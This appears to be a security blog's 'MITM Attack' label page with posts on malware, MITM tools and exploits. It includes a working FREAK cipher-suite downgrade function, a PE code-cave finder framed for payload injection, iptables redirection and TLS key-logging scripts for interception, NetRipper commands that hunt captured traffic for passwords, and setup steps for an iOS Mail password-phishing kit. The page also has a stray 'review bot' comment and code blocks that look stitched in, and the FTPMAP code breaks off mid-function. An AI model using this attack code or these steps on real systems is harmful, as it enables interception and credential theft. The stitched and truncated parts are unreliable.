Showing posts with the label MITM Attack. Show all posts

Hackers Can Steal Your Information Through Earphones



As we already know, voice assistants such as Google Now and Siri listen to us through our mobile devices, and that in itself is a security risk.

Researchers at ANSSI, the French information security agency, have worked out how to use radio waves to silently trigger voice commands on iPhones and Android phones, provided the phone has headphones plugged in and Google Now or Siri enabled.

The researchers showed that an attacker can use the injected commands to make calls, send texts or open a malware site without the owner noticing, from up to about 16 feet (5 metres) away.

According to Wired:
The researchers used the headphone cord as an antenna, exploiting its wire to convert electromagnetic waves into electrical signals that appear to the phone to be audio coming from the user's microphone.

Earlier, an IEEE paper was published on the same topic:

This research exploits the principle of front-door coupling on smartphone headphone cables with specific electromagnetic waveforms. We present a smart use of intentional electromagnetic interference, resulting in finer impacts on an information system than a classical denial of service effect. As an outcome, we introduce a new silent remote voice command injection technique on modern smartphones.

Why is this silent radio attack dangerous? The injected commands can:

  • Make calls
  • Send text messages
  • Browse phishing or malware websites
  • Send spam through social media accounts


How does this attack work?
Watch the video:


~ Friday 16 October 2015

YiSpecter: iOS Malware That Attacks Both Jailbroken And Non-Jailbroken Apple iOS Devices



YiSpecter is different from previously seen iOS malware in that it attacks both jailbroken and non-jailbroken iOS devices through unique and harmful malicious behaviors. 

Claud Xiao, a researcher at the security firm Palo Alto Networks, describes how the malware works on iOS devices; it targets users in China and Taiwan.

He said in the blog,

Specifically, it’s the first malware we’ve seen in the wild that abuses private APIs in the iOS system to implement malicious functionalities.

Screenshot: a YiSpecter-infected iOS device

YiSpecter is the first real world iOS malware that combines these two attack techniques and causes harm to a wider range of users. It pushes the line barrier of iOS security back another step.


  • Whether an iPhone is jailbroken or not, the malware can be successfully downloaded and installed.
  • Even if you manually delete the malware, it will automatically re-appear
  • Using third-party tools you can find some strange additional “system apps” on infected phones
  • On infected phones, in some cases when the user opens a normal app, a full screen advertisement will show.


Palo Alto Networks has released IPS and DNS signatures to block YiSpecter's malicious traffic, and its blog post also explains how users can manually remove YiSpecter and avoid similar attacks in the future. Apple has also been notified.

According to analysis reports by Qihoo 360 and Cheetah Mobile, YiSpecter was also spread by the Lingdun worm.
Screenshot: a malicious webpage uploaded by the Lingdun worm

Lingdun uses fake VeriSign and Symantec certificates to bypass malware detection systems. Its primary goal is to download and to install additional Windows software onto a PC. Most of this additional software is benign but at least one installation was malicious.

Apple said in a statement:

"This issue only impacts users on older versions of iOS who have also downloaded malware from untrusted sources. We addressed this specific issue in iOS 8.4 and we have also blocked the identified apps that distribute this malware. We encourage customers to stay current with the latest version of iOS for the latest security updates. We also encourage them to only download from trusted sources like the App Store and pay attention to any warnings as they download apps.”

How to Remove YiSpecter from Your iOS Devices?

  • Go to Settings –> General –> Profiles and remove all unknown or untrusted profiles.
  • Delete any installed apps with the names 情涩播放器, 快播私密版 or 快播0.
  • Use a third-party iOS management tool such as iFunBox on Windows or Mac OS X to connect to your iPhone or iPad.
  • Check the installed apps: YiSpecter's fake "system apps" use names like Phone, Weather, Game Center, Passbook, Notes or Cydia. If apps with those names show up as installed third-party apps, delete them.



Last month, we reported that the XcodeGhost malware had infected almost 40 popular apps in the Chinese App Store.

~ Tuesday 6 October 2015

GitHub Announces Support For Universal 2nd Factor Authentication (U2F)



A rapidly growing open authentication standard!

These physical USB keys provide the second factor when you plug them in and touch the button: the key signs a challenge sent by the site, so you no longer type a six-digit code from Google Authenticator or a similar app. GitHub announced the support together with a partnership with Yubico.

Two-factor authentication is a security process in which the user presents two means of identification from separate categories of credentials: typically something you have, such as a physical token, and something you know, such as a password or security code.

The FIDO U2F Security Key by Yubico is a specially designed YubiKey, relying on high-security, public-key cryptography. U2F is built to protect against phishing and man-in-the-middle attacks, allowing one U2F authenticator to access any number of services without any shared secrets.

What is U2F — FIDO UNIVERSAL 2ND FACTOR

U2F is an open authentication standard that enables internet users to securely access any number of online services with one single device, instantly and with no drivers or client software needed.

U2F was created by Google and Yubico, with contribution from NXP, and is today hosted by the open-authentication industry consortium FIDO Alliance.
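To make the phishing and man-in-the-middle resistance concrete, here is an added example written for this page (it is not GitHub's or Yubico's code) that models the U2F registration and authentication exchange between a token, the browser and a relying party. Assumptions: a real U2F token signs with an ECDSA P-256 key and the relying party keeps only the public key; to stay free of third-party libraries, this model stands in an HMAC over the same fields for the signature and lets the relying party keep the per-registration key it would otherwise hold as a public key. The appId/origin binding, the key-handle check and the counter check are structured as in U2F; the origins such as github.com.login-verify.example are made up.

```python
import hashlib
import hmac
import secrets


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


class Token:
    """Simulated U2F authenticator: one device secret, many registrations,
    one monotonically increasing counter."""

    def __init__(self):
        self.master = secrets.token_bytes(32)   # never leaves the token
        self.counter = 0

    def _reg_key(self, app_id_hash: bytes, nonce: bytes) -> bytes:
        # Stand-in for the per-registration ECDSA key pair (assumption, see lead-in).
        return hmac.new(self.master, b"key" + app_id_hash + nonce, hashlib.sha256).digest()

    def _handle_tag(self, app_id_hash: bytes, nonce: bytes) -> bytes:
        return hmac.new(self.master, b"kh" + app_id_hash + nonce, hashlib.sha256).digest()[:16]

    def register(self, app_id_hash: bytes):
        nonce = secrets.token_bytes(16)
        # Key handle = nonce + tag; the tag binds the handle to this appId,
        # so the token refuses to use it for any other origin.
        key_handle = nonce + self._handle_tag(app_id_hash, nonce)
        return key_handle, self._reg_key(app_id_hash, nonce)   # second value plays the "public key"

    def authenticate(self, app_id_hash: bytes, key_handle: bytes, client_data_hash: bytes):
        nonce, tag = key_handle[:16], key_handle[16:]
        if not hmac.compare_digest(tag, self._handle_tag(app_id_hash, nonce)):
            raise ValueError("key handle was not registered for this appId")
        self.counter += 1
        user_presence = b"\x01"                       # the button was touched
        signed = app_id_hash + user_presence + self.counter.to_bytes(4, "big") + client_data_hash
        sig = hmac.new(self._reg_key(app_id_hash, nonce), signed, hashlib.sha256).digest()
        return user_presence, self.counter, sig


class Browser:
    """The client derives both hashes from the origin the page was really
    loaded from; a page cannot substitute another site's origin."""

    @staticmethod
    def app_id_hash(origin: str) -> bytes:
        return sha256(origin.encode())

    @staticmethod
    def client_data_hash(challenge: bytes, origin: str) -> bytes:
        return sha256(b"navigator.id.getAssertion|" + challenge + b"|" + origin.encode())


class RelyingParty:
    def __init__(self, origin: str):
        self.origin = origin
        self.app_id_hash = Browser.app_id_hash(origin)
        self.registrations = {}   # key_handle -> (reg_key, last_counter)

    def register(self, token: Token) -> bytes:
        key_handle, reg_key = token.register(self.app_id_hash)
        self.registrations[key_handle] = (reg_key, 0)
        return key_handle

    def verify(self, key_handle, challenge, user_presence, counter, sig) -> bool:
        if key_handle not in self.registrations:
            return False
        reg_key, last = self.registrations[key_handle]
        if counter <= last:            # replayed response or cloned token
            return False
        # Recomputed with the RP's *own* origin: a response produced for a
        # look-alike origin can never verify here.
        signed = (self.app_id_hash + user_presence + counter.to_bytes(4, "big")
                  + Browser.client_data_hash(challenge, self.origin))
        expected = hmac.new(reg_key, signed, hashlib.sha256).digest()
        if not hmac.compare_digest(sig, expected):
            return False
        self.registrations[key_handle] = (reg_key, counter)
        return True


def demo():
    """Returns (legit_login_ok, phishing_login_ok, replay_ok)."""
    token = Token()
    github = RelyingParty("https://github.com")
    key_handle = github.register(token)

    challenge = secrets.token_bytes(32)
    origin = "https://github.com"
    up, ctr, sig = token.authenticate(Browser.app_id_hash(origin), key_handle,
                                      Browser.client_data_hash(challenge, origin))
    legit_ok = github.verify(key_handle, challenge, up, ctr, sig)
    replay_ok = github.verify(key_handle, challenge, up, ctr, sig)   # same response again

    # Phishing: the attacker's page relays GitHub's real challenge and key
    # handle, but the victim's browser is at a look-alike origin (made up).
    phish = "https://github.com.login-verify.example"
    try:
        token.authenticate(Browser.app_id_hash(phish), key_handle,
                           Browser.client_data_hash(challenge, phish))
        phish_ok = True
    except ValueError:
        phish_ok = False
    return legit_ok, phish_ok, replay_ok


if __name__ == "__main__":
    print(demo())
```

Two independent checks defeat the relay: the token refuses a key handle that was not registered for the origin the browser reports, and even a token that signed anyway would produce a signature over the wrong appId hash, which the relying party's recomputation would reject. The counter check is what makes a captured response useless a second time.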



Image: U2F is used with USB devices, including YubiKeys, as one of many authentication methods

To take advantage of the security improvements provided by U2F, you need to buy a hardware key; U2F keys are available from a range of vendors. GitHub is partnering with Yubico, inventor of the YubiKey, co-creator of the U2F protocol and a leading provider of U2F authenticators.

Together with Yubico, GitHub is offering discounts to GitHub users for a limited time through a special offer page where you verify your GitHub account and place your order:

  • While supplies last, GitHub users can purchase special edition U2F Security Keys for $5 plus shipping and handling (regular price $18; 5,000 special edition keys available).
  • After the special keys are gone, all GitHub users are eligible for a 20% discount on U2F-certified YubiKeys, for a limited time.
  • In addition, all students who are eligible for the Student Developer Pack will receive a 20% discount on any U2F-certified YubiKey.

~ Friday 2 October 2015

PEinjector - MITM Portable Executable (PE) File Infector




The executable file format on the Windows platform is PE/COFF. peinjector provides different ways to infect these files with custom payloads without changing their original functionality.

It creates patches that are then applied on the fly while the file is being transferred through a man-in-the-middle proxy. It is fast, lightweight and modular, and can run on embedded hardware.

Features


  • Full x86 and x64 PE file support.
  • Open Source
  • Fully working on Windows and Linux, including automated installation scripts.
  • Can be operated on embedded hardware, tested on a Raspberry Pi 2.
  • On Linux, all servers will be automatically integrated as service, no manual configuration required.
  • Plain C, no external libraries required (peinjector).
  • MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
  • Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
  • Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.


peinjector
Provides PE file patching as a service. Just send the raw header of your PE file and you’ll receive a custom-made patch for it. Can be remotely controlled via a command protocol.

peinjector-control
Web interface to configure and control a peinjector server. A small shellcode factory with some basic shellcodes, automatic encryption/obfuscation and thread generation is provided; alternatively, custom shellcode can be injected.

peinjector-interceptor
Sample MITM integration. Based on Python and libmproxy, supports SSL interception, can act as transparent Proxy, HTTP Proxy, ... . Provides seamless PE patching capabilities.
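The service described above needs only the PE header to decide where a payload can go. The following added example (written for this page, not peinjector's own code) parses the DOS header, COFF file header, optional header and section table of a PE32/PE32+ image and lists the file-aligned slack ("code caves") at the end of each section, together with whether the section is executable. The sample image is constructed inline (headers and padding only, not a real program); the field offsets are those of the PE/COFF specification.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe_header(data: bytes) -> dict:
    """Parse DOS header, COFF file header, optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                       # IMAGE_FILE_HEADER (20 bytes)
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                           # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # same offset in PE32 and PE32+
    sect_align, file_align = struct.unpack_from("<II", data, opt + 32)
    sections = []
    for i in range(nsec):                                   # IMAGE_SECTION_HEADER (40 bytes each)
        (name, vsize, va, rawsize, rawptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    machines = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}
    return {"machine": machines.get(machine, hex(machine)), "pe32plus": magic == PE32PLUS_MAGIC,
            "image_base": image_base, "entry_rva": entry_rva,
            "section_align": sect_align, "file_align": file_align, "sections": sections}


def section_for_rva(info: dict, rva: int):
    for s in info["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def find_caves(info: dict, min_size: int = 1):
    """Slack between a section's used bytes and its file-aligned raw size: an
    infector that must not grow the file or add sections looks here first."""
    caves = []
    for s in info["sections"]:
        slack = s["rawsize"] - s["vsize"]
        if slack >= min_size:
            caves.append({"section": s["name"], "size": slack,
                          "file_offset": s["rawptr"] + s["vsize"], "rva": s["va"] + s["vsize"],
                          "executable": bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE),
                          "writable": bool(s["chars"] & IMAGE_SCN_MEM_WRITE)})
    return caves


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (headers plus padding, not a real program)."""
    img = bytearray(0x600)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                            # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 0xE0, 0x0102)
    opt = 0x58
    struct.pack_into("<H", img, opt, PE32_MAGIC)
    struct.pack_into("<I", img, opt + 16, 0x1000)                      # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 28, 0x400000)                    # ImageBase
    struct.pack_into("<II", img, opt + 32, 0x1000, 0x200)              # Section/FileAlignment
    sec = opt + 0xE0
    struct.pack_into("<8sIIIIIIHHI", img, sec, b".text", 0x100, 0x1000, 0x200, 0x200,
                     0, 0, 0, 0, 0x60000020)                           # CODE | EXECUTE | READ
    struct.pack_into("<8sIIIIIIHHI", img, sec + 40, b".data", 0x50, 0x2000, 0x200, 0x400,
                     0, 0, 0, 0, 0xC0000040)                           # INITIALIZED_DATA | READ | WRITE
    img[0x200:0x300] = b"\xcc" * 0x100                                 # pretend code
    return bytes(img)


if __name__ == "__main__":
    info = parse_pe_header(build_sample_pe())
    print(info["machine"], hex(info["entry_rva"]), find_caves(info))
```

A patch server would use the executable cave in .text for the payload and then redirect AddressOfEntryPoint (or patch the original entry) to it; the .data cave is larger but not executable, so using it would also require flipping the section's characteristics, which is a much louder change.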



~ Monday 21 September 2015

SniffLab: Setup Your Own MITM, Packet Sniffing WiFi Access Point


Setting up a SNIFFLAB
Scripts to create your own MITM'ing, packet sniffing WiFi access point.

Firewall rules on DD-WRT router to send traffic to MITM proxy box

Make sure the network interface (vlan1 here) is correct.

PROXYIP=your.proxy.ip
# Let the proxy box's own outbound web traffic through unmarked, otherwise it would loop back to itself
iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP
# Mark every other client's HTTP/HTTPS flow ...
iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443
# ... and send marked packets through routing table 2, whose default route is the proxy box
ip rule add fwmark 3 table 2
ip route add default via $PROXYIP dev vlan1 table 2

PCAP machine scripts

/etc/network/interfaces

auto lo
iface lo inet loopback
# eth0/eth1 are the two tap legs: no address, bonded below
iface eth0 inet manual
iface eth1 inet manual
# wlan0 is the management link (WPA settings in wpa_supplicant.conf)
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

# bond-mode 3 (broadcast): sniffer.py sees frames from both legs on one interface
auto bond0
iface bond0 inet dhcp
bond-mode 3
bond-miimon 100
slaves eth0 eth1

/etc/wpa_supplicant/wpa_supplicant.conf

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
        ssid=""
        # hashed PSK as printed by wpa_passphrase, not the plain-text passphrase
        psk=hashofyourpassword
        proto=RSN
        key_mgmt=WPA-PSK
        # TKIP is the legacy WPA cipher; use CCMP if the access point supports WPA2
        pairwise=TKIP
        auth_alg=OPEN
}

Getting the network running correctly on boot

/etc/init.d/network.sh

#!/bin/sh
### BEGIN INIT INFO
# Provides:     network.sh
# Short-Description:    Ensure WiFi as well as Ethernet interfaces are up
# Description:
# Default-Start:    2 3 4 5
# Default-Stop:     0 1 6
# Required-Start:   $remote_fs $syslog
# Required-Stop:    $remote_fs $syslog
### END INIT INFO
sudo ifplugd eth0 --kill
sudo ifup wlan0
sudo ifup eth0
sudo ifup eth1
sudo ifconfig eth1 promisc
sudo ifconfig eth0 promisc
exit 0

Start capturing packets on startup -- create a sniffer service

/etc/init/sniffer.conf

#sniffer.conf
start on runlevel [2345]
stop on runlevel [016]

script
    cd /home/pi/snifflab
    exec python sniffer.py -i bond0 -s 100 -t 1200
end script

MITM proxy service

mitm.conf

start on filesystem

script
    # em1 faces the router; 4567 must match the port mitmdump listens on (set in common.conf or with -p)
    sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567
    # TLS session keys are written here so the captured pcaps can be decrypted later (e.g. in Wireshark)
    SSLKEYLOGFILE=/var/log/mitmkeys.log
    export SSLKEYLOGFILE
    echo "MITM Keys being logged here: $SSLKEYLOGFILE"
    exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf
end script

Script to backup pcaps to local machine

#!/bin/bash
set -e
remote_server=yourservername
pcap_dir=/pcaps
keylogfile=/var/log/mitmkeys.log
local_dir=~/Documents/snifflab

mkdir -p "$local_dir"
rsync -a "$remote_server":"$pcap_dir" "$local_dir"
scp "$remote_server":"$keylogfile" "$local_dir"


~ Monday 17 August 2015

NetRipper - Smart Traffic Sniffing For Penetration Testers



Description
NetRipper is a post-exploitation tool for Windows systems. It uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, capturing both plain-text traffic and encrypted traffic before encryption or after decryption.

NetRipper was released at Defcon 23, Las Vegas, Nevada.

Abstract
The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application.

Tested applications
NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support.

Components
NetRipper.exe - Configures and inject the DLL
DLL.dll       - Injected DLL, hook APIs and save data to files
netripper.rb  - Metasploit post-exploitation module

Command line
Injection: NetRipper.exe DLLpath.dll processname.exe  
Example:   NetRipper.exe DLL.dll firefox.exe

Generate DLL:

  -h,  --help          Print this help message
  -w,  --write         Full path for the DLL to write the configuration data
  -l,  --location      Full path where to save data files (default TEMP)

Plugins:

  -p,  --plaintext     Capture only plain-text data. E.g. true
  -d,  --datalimit     Limit capture size per request. E.g. 4096
  -s,  --stringfinder  Find specific strings. E.g. user,pass,config

Example:
NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass  

Metasploit module

msf > use post/windows/gather/netripper
msf post(netripper) > show options

Module options (post/windows/gather/netripper):

Name           Current Setting                  Required  Description
----           ---------------                  --------  -----------
DATALIMIT      4096                             no        The number of bytes to save from requests/responses
DATAPATH       TEMP                             no        Where to save files. E.g. C:\Windows\Temp or TEMP
PLAINTEXT      true                             no        True to save only plain-text data
PROCESSIDS                                      no        Process IDs. E.g. 1244,1256
PROCESSNAMES                                    no        Process names. E.g. firefox.exe,chrome.exe
SESSION                                         yes       The session to run this module on.
STRINGFINDER   user,login,pass,database,config  no        Search for specific strings in captured data

Set PROCESSNAMES and run.

Metasploit installation (Kali)
  • cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
  • mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  • g++ -Wall netripper.cpp -o netripper
  • cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  • cd ../Release
  • cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

Plugins
  • PlainText - Allows to capture only plain-text data
  • DataLimit - Save only the first bytes of requests and responses
  • StringFinder - Find specific strings in network traffic

To do
  • Support multiple applications
  • Support for x64 processes
  • Thread-safe API hooking
  • Monitor loading of DLLs and new processes

Author
Ionut Popescu, Senior Security Consultant at KPMG Romania


~ Friday 14 August 2015

The Wind: Man In The Middle (MITM) Attack Tool




A tool for performing man-in-the-middle attacks on multiple application-layer protocols.

What is MITM Attack?
A man-in-the-middle (MITM) attack is a form of eavesdropping in which the communication between two parties is intercepted, monitored and possibly modified by an unauthorized third party sitting between the two systems.

For now, it only supports SSL protocol.



Features

  • SSL Freak Attack


Installation

1) mv ssl_tls.py to ./scapy/layers

2) modify ./scapy/config.py to autoload ssl_tls layer

    config.py::Conf::load_layers 
    375,376c375
    <                    "sebek", "skinny", "smb", "snmp", "tftp", "x509", "bluetooth", "dhcp6", "llmnr", "sctp", "vrrp",
    <                    "ssl_tls", ]
    ---
    >                    "sebek", "skinny", "smb", "snmp", "tftp", "x509", "bluetooth", "dhcp6", "llmnr", "sctp", "vrrp"]
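Review bot: the hunk reads backwards for anyone applying it by hand: with `375,376c375` the `<` side (the list that ends in `"vrrp",` / `"ssl_tls", ]`) is the already edited config.py and the `>` side is the stock file, i.e. this was produced with `diff modified original`. State the intent in one sentence above it: append `"ssl_tls"` to the `load_layers` list in `Conf`, which is what makes scapy import the layer copied in step 1. Also note that the line numbers 375-376 belong to the scapy release used and will not match other versions.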

Usage


  • redirect traffic to port 8888, with iptables on Linux:
    iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8888
    or with pf on BSD:
    rdr on xxiface inet proto tcp from xxx.xxx.xxx.xxx/xx to any port = 443 -> 127.0.0.1 port 8888
  • edit wind.py to import the right module; for example, add import freak to launch the SSL FREAK attack
  • you can write your own module to implement a specific SSL attack; the compulsory functions you need to supply are those in forward.py
  • if the man in the middle should connect to another server, set use OrinAddr = False, then set ip and port
  • set doProcess = True to make the process functions take effect
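As an added example (not part of The Wind), the following code shows what a FREAK-style module has to do to a ClientHello and how to detect the same condition: it parses the TLS record and handshake headers, lists the offered cipher suites, and rewrites the suite list to export-grade RSA suites while patching the record and handshake lengths. The ClientHello is constructed inline with no extensions. Whether the downgrade succeeds in practice depends on the server still supporting export suites and on the client's TLS library accepting a suite it never offered, which is the FREAK client bug.

```python
import struct

# RSA export suites (40/56-bit ciphers, 512/1024-bit RSA) that a FREAK-style
# MITM tries to force; the values are the standard IANA assignments.
RSA_EXPORT_SUITES = {
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0006: "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
    0x0008: "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x0062: "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA",
    0x0064: "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA",
}


def build_client_hello(suites, random_bytes=b"\x11" * 32) -> bytes:
    """Constructed ClientHello record (no extensions) for the demo."""
    cs = b"".join(struct.pack("!H", s) for s in suites)
    hello = (struct.pack("!H", 0x0303) + random_bytes + b"\x00"      # version, random, empty session id
             + struct.pack("!H", len(cs)) + cs + b"\x01\x00")          # suites, one compression method (null)
    hs = b"\x01" + len(hello).to_bytes(3, "big") + hello               # handshake header: ClientHello
    return struct.pack("!BHH", 0x16, 0x0301, len(hs)) + hs             # record header: handshake, TLS 1.0


def parse_client_hello(record: bytes) -> dict:
    ctype, rec_ver, rlen = struct.unpack_from("!BHH", record, 0)
    if ctype != 0x16:
        raise ValueError("not a handshake record")
    body = record[5:5 + rlen]
    if len(body) != rlen or body[0] != 0x01:
        raise ValueError("truncated record or not a ClientHello")
    if int.from_bytes(body[1:4], "big") != len(body) - 4:
        raise ValueError("handshake length mismatch")
    p = 4
    client_ver = struct.unpack_from("!H", body, p)[0]
    p += 2 + 32                                 # version + random
    p += 1 + body[p]                            # session id (length-prefixed)
    cs_pos = p
    cs_len = struct.unpack_from("!H", body, p)[0]
    p += 2
    suites = [struct.unpack_from("!H", body, p + i)[0] for i in range(0, cs_len, 2)]
    return {"record_version": rec_ver, "client_version": client_ver, "cipher_suites": suites,
            "_cs_pos": cs_pos, "_cs_len": cs_len, "_body": body}


def export_suites_offered(record: bytes):
    """Detection side: names of the RSA export suites a client offers itself."""
    return [RSA_EXPORT_SUITES[s] for s in parse_client_hello(record)["cipher_suites"]
            if s in RSA_EXPORT_SUITES]


def freak_downgrade(record: bytes) -> bytes:
    """MITM side: replace the offered suites with export-grade RSA suites and
    fix up the handshake and record lengths so the server still parses it."""
    h = parse_client_hello(record)
    body, pos, old_len = h["_body"], h["_cs_pos"], h["_cs_len"]
    new_cs = b"".join(struct.pack("!H", s) for s in RSA_EXPORT_SUITES)
    new_body = body[:pos] + struct.pack("!H", len(new_cs)) + new_cs + body[pos + 2 + old_len:]
    new_body = new_body[:1] + (len(new_body) - 4).to_bytes(3, "big") + new_body[4:]
    return record[:3] + struct.pack("!H", len(new_body)) + new_body


if __name__ == "__main__":
    hello = build_client_hello([0xC02F, 0x002F, 0x000A])
    print(export_suites_offered(hello))
    print(export_suites_offered(freak_downgrade(hello)))
```

On the server side the same table answers the question "is this server FREAK-exposed": if a ServerHello ever selects one of these suites, or a scanner can negotiate one, the 512-bit export RSA key can be factored offline and the session key recovered. A forward() module built on this must apply the rewrite only to the first handshake record of a connection, before any encrypted data.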




~ Saturday 11 July 2015

Hack iOS Mail App Credentials: Exploit Working [Video]


iOS 8.3 Mail app injection kit!

This injection kit targets every iOS 8.3 Mail app and was developed by Jan Soucek. It exploits a bug in the iOS Mail app that lets an attacker display a fake password prompt to the user. So beware of such prompts, and think twice before entering your Apple ID credentials.

Back in January 2015, Jan stumbled upon a bug in iOS's mail client that results in an HTML tag in e-mail messages not being ignored.

This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password "collector" using simple HTML and CSS.

It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof-of-concept code here.

Demo:


Usage

  • Edit the e-mail address you would like to use for password collection in framework.php
  • Upload index.php, framework.php and mydata.txt to your server
  • Send an e-mail containing HTML code from e-mail.html to the research subject
  • Don't forget to change the modal-username GET parameter value to the e-mail address of the recipient
  • You can use https://putsmail.com for testing purposes


Credits
Framework7: Vladimir Kharlampidi (http://www.idangero.us/framework7) - Framework7's CSS code was used for the login dialog styling

License
MIT

Notes
The code detects that the research subject has already visited the page in the past (using cookies) and it stops displaying the password prompt to reduce suspicion.

The e-mail address and password are submitted via GET to framework.php, which then saves them to the mydata.txt file, sends them out via e-mail to the specified "collector" e-mail address and then returns the research subject back to Mail.app using redirect to message://dummy.

The password field has autofocus enabled. We then use focus detection to hide the login dialog once the password field loses its focus (e.g. after the subject clicks on OK and submits the password).


~ Wednesday 10 June 2015

FTPMAP - Advanced Remote FTP Scanner


Want to start testing FTP servers?

FTPMAP is a good tool to start with: it gives you a lot of valuable information that can help in a security pentest.

What's it?

Ftpmap scans remote FTP servers to identify what software and what versions they are running. It uses program-specific fingerprints to discover the name of the software even when banners have been changed or removed, or when some features have been disabled. Ftpmap can also flag known vulnerabilities for the detected FTP software and version.
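As an added example (not Ftpmap's code or its fingerprint database), the following Python shows the idea behind banner-independent fingerprinting: send a fixed set of probes (SYST, an unknown command, FEAT, HELP), ignore the greeting banner entirely, and score each candidate server by how closely its known first reply lines match. The fingerprint table is illustrative and should be rebuilt from real servers before use; the fake server below is constructed with a vsftpd-style reply set but a banner rewritten to claim ProFTPD. live_send() uses the standard ftplib so the same scorer can be pointed at a real host.

```python
import ftplib

# Illustrative fingerprints (assumption: not Ftpmap's database). Each entry is
# the first line of the reply expected for a probe; the greeting is not used.
FINGERPRINTS = {
    "vsftpd": {
        "SYST": "215 UNIX Type: L8",
        "XYZZY": "500 Unknown command.",
        "FEAT": "211-Features:",
        "HELP": "214-The following commands are recognized.",
    },
    "ProFTPD": {
        "SYST": "215 UNIX Type: L8",
        "XYZZY": "500 XYZZY not understood",
        "FEAT": "211-Features:",
        "HELP": "214-The following commands are recognized (* =>'s unimplemented):",
    },
    "Microsoft IIS FTP": {
        "SYST": "215 Windows_NT",
        "XYZZY": "500 'XYZZY': command not understood",
        "FEAT": "211-Extended features supported:",
        "HELP": "214-The following commands are recognized (* ==>'s unimplemented).",
    },
}
PROBES = ("SYST", "XYZZY", "FEAT", "HELP")


def first_line(reply: str) -> str:
    return reply.splitlines()[0].strip() if reply else ""


def score(observed: dict) -> list:
    """Rank candidates by probe agreement: exact first line = 2 points,
    same 3-digit reply code only = 1 point. Returns [(name, score), ...], best first."""
    results = []
    for name, sig in FINGERPRINTS.items():
        points = 0
        for cmd, expected in sig.items():
            got = first_line(observed.get(cmd, ""))
            if not got:
                continue                      # probe not answered / feature disabled
            if got == expected:
                points += 2
            elif got[:3] == expected[:3]:
                points += 1
        results.append((name, points))
    return sorted(results, key=lambda r: -r[1])


def fingerprint(send) -> list:
    """`send(cmd)` returns the server's reply text (fake or live session)."""
    return score({cmd: send(cmd) for cmd in PROBES})


def live_send(host: str, port: int = 21, user: str = "anonymous",
              password: str = "ftpmap@example.invalid"):
    """Builds a send() over a real FTP session (network access required)."""
    ftp = ftplib.FTP()
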